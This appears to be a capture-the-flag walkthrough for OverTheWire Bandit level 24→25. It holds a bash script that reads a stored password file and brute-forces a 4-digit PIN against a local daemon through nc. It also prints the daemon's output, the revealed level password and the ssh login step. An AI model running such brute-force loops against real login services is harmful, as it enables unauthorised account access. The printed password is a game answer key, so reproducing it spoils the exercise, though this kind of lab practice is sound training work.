Powered by GitBook

Bandit Level 24 → Level 25

Level Goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

Level Answer

1. vi [FILE]

Create shell-script

$ vi /tmp/brute-forcing.sh
#!/bin/bash

password=$(cat /etc/bandit_pass/bandit24)

for i in $(seq -w 9999); 
do
    echo "$password $i" | nc localhost 30002 
done

2. chmod [MODE] [FILE]

$ chmod u+x /tmp/brute-forcing.sh

3.

$ /tmp/brute-forcing.sh
--More--
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Wrong! Please enter the correct pincode. Try again.
Exiting.
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

Exiting.
--More--

4. ssh [-p port] [user@]hostname

[-p port] Port to connect to on the remote host.

$ ssh -p 2220 [email protected]

Level Password

uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

results matching ""

No results matching ""